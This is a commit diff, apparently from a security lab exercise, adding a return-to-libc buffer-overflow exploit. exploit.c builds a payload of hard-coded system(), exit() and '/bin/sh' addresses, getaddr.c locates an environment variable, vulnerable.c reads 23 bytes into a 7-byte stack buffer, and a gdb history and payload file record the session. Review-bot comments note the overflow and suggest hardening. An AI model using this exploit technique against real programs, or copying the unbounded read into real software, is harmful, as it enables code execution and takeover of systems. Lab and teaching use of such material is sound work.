
Commit 6c0307b

committed
final push
1 parent cab7354 commit 6c0307b


9 files changed

+72
-0
lines changed


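--- a/.gdb_history
+++ b/.gdb_history
@@ -0,0 +1,22 @@
+run
+b main
+r
+p system
+p exit
+x/s 0xbffffe16
+run
+run
+run
+b main
+r
+p systen
+p system
+p exit
+r
+r
+r
+run
+b main
+run
+run
+run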

badfile

Lines changed: 1 addition & 0 deletions
@@ -0,0 +1 @@
1+
AAAAAAAAAAAAAAAAAAA�MڷЉٷ���

core

640 KB
Binary file not shown.

exploit

7.3 KB
Binary file not shown.

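--- a/exploit.c
+++ b/exploit.c
@@ -0,0 +1,18 @@
+#include <stdlib.h>
+#include <stdio.h>
+#include <string.h>
+int main(int argc, char **argv)
+{
+char buf[31];
+FILE *badfile;
+badfile = fopen("./badfile", "w");
+
+strcpy(buf,"AAAAAAAAAAAAAAAAAAA"); // 19
+*(long *) &buf[27] = 0xbffffe0e ; // "/bin/sh"
+*(long *) &buf[19] = 0xb7da4da0 ; // system()
+*(long *) &buf[23] = 0xb7d989d0 ; // exit()
+fwrite(buf, sizeof(buf), 1, badfile);
+fclose(badfile);
+}
+
+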
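Review bot: The three constants stored into `buf` at offsets 19, 23 and 27 are absolute addresses, and nothing in the file records which environment they were taken from. They look like values from a single 32-bit debugging session and can only match a process image with address-space randomization disabled and that exact libc build, so the file should say so in a header comment, for example `/* lab exercise only: addresses are specific to one non-randomized 32-bit lab image */`. Separately, the result of `fopen("./badfile", "w")` is never checked, so a failed open hands NULL to `fwrite` and `fclose`; add `if (!badfile) { perror("badfile"); return 1; }`. `main` also falls off the end without an explicit `return`.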

getaddr

7.21 KB
Binary file not shown.

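--- a/getaddr.c
+++ b/getaddr.c
@@ -0,0 +1,6 @@
+int main() {
+char *shell = getenv("MYSHELL");
+if (shell)
+printf("%x\n", shell);
+return 0;
+}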
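Review bot: `printf("%x\n", shell);` passes a `char *` where `%x` expects an `unsigned int`, which is undefined behaviour and silently truncates the value wherever pointers are wider than `int`; the portable form is `printf("%p\n", (void *)shell);`. The file also has no `#include <stdio.h>` or `#include <stdlib.h>`, so `getenv` and `printf` are implicitly declared and `getenv` is assumed to return `int`. Compiling with `-Wall` would surface both problems.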

vulnerable

7.3 KB
Binary file not shown.

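--- a/vulnerable.c
+++ b/vulnerable.c
@@ -0,0 +1,25 @@
+#include <stdlib.h>
+#include <stdio.h>
+
+int bof(FILE *badfile)
+{
+char buffer[7];
+
+fread(buffer, sizeof(char), 23, badfile);
+
+return 1;
+}
+
+int main(int argc, char **argv)
+{
+FILE *badfile;
+
+badfile = fopen("badfile", "r");
+bof(badfile);
+
+printf("Returned Properly\n");
+
+fclose(badfile);
+return 1;
+}
+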
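Review bot: `fread(buffer, sizeof(char), 23, badfile);` in `bof` reads up to 23 bytes into `char buffer[7]`, so file contents overwrite stack data beyond the array. If this is meant as a deliberately vulnerable lab target, as the filename suggests, state that in a comment at the top of the file and keep it out of any non-lab build; otherwise bound the read with `fread(buffer, sizeof(char), sizeof(buffer), badfile);`. Because the array is smaller than 8 bytes, GCC's plain `-fstack-protector` does not instrument `bof` by default, so a hardened build needs `-fstack-protector-strong` or `-fstack-protector-all` to catch the overwrite. `main` also passes the unchecked result of `fopen("badfile", "r")` to `bof` and `fclose`, which dereferences NULL when the file is missing.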
